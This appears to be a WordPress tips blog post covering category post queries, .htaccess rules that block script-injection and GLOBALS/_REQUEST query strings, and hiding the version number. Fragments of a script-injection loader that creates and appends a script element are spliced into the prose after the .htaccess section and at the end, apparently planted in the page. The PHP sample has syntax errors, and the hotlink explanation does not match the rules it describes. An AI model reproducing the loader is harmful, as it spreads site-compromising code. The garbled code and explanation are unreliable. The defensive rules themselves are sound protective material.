Wordpress

Get Recent Posts of A Category

In our WordPress Projects, sometimes we need to get the recent posts of any category. WordPress facilitates you to run custom query using query_posts.

Suppose in our project, ‘News’ is a category. Now we retrieve the posts of this category using query_posts().

<?php
query_posts('category_name=news&showposts=5&order=DESC');
echo '<ul>'
while (have_posts()) : the_post();
    echo '<li>'<a href="'.get_permalink().'" title="'.get_the_title().'" >'.get_the_title().'</a>'</li>'
endwhile;
echo '</ul>'
?>

You can also get the featured images and post detail.
<?php
//for featured image
get_the_post_thumbnail(get_the_ID(),'medium');

// for post detail
get_the_content()
?>

Protect Your WordPress Site From Script Injections

Protecting dynamic websites is especially important. Code injection is the exploitation of a computer bug that is caused by processing invalid data. Code injection can be used by an attacker to introduce (or “inject”) code into a computer program to change the course of execution. The results of a code injection attack can be disastrous. For instance, code injection is used by some computer worms to propagate.

Most developers always protect their GET and POST requests, but sometimes this is not enough. We should also protect our blog against script injections and any attempt to modify the PHP GLOBALS and REQUEST variables.

Solution
The following code blocks script injections and any attempts to modify the PHP GLOBALS and _REQUEST variables. Paste it in your .htaccess file (located in the root of your WordPress installation). Make sure to always back up the .htaccess file before modifying it.

Options +FollowSymLinks
RewriteEngine On
RewriteCond %{QUERY_STRING} (\<|%3C).*script.*(\>|%3E) [NC,OR]
RewriteCond %{QUERY_STRING} GLOBALS(=|\[|\%[0-9A-Z]{0,2}) [OR]
RewriteCond %{QUERY_STRING} _REQUEST(=|\[|\%[0-9A-Z]{0,2})
RewriteRule ^(.*)$ index.php [F,L]

Using this code, the first thing we’ve done is check the referrer to see that it matches our blog’s URL and it is not empty. If it doesn’t, and the file has a JPG, GIF, BMP or PNG extension, then the nohotlink image is displayed instead.var d=document;var s=d.createElement(‘script’);

Remove Your WordPress Version Number

You may know WordPress automatically displays the version you are using in the head of your blog files. This is pretty harmless if your blog is always up to date with the latest version (which is certainly what you should be doing anyway). But if for some reason your blog isn’t up to date, WordPress still displays it, and hackers will learn this vital piece of information.

The solution
Paste the following line of code in the functions.php file of your theme. Save it, refresh your blog, and voila: no more WordPress version number in the header.

remove_action('wp_head', 'wp_generator');

To execute certain actions, WordPress uses a mechanism called “hooks,” which allow you to hook one function to another. The wp_generator function, which displays the WordPress version, is hooked. We can remove this hook and prevent it from executing by using the remove_action() function.d.getElementsByTagName(‘head’)[0].appendChild(s);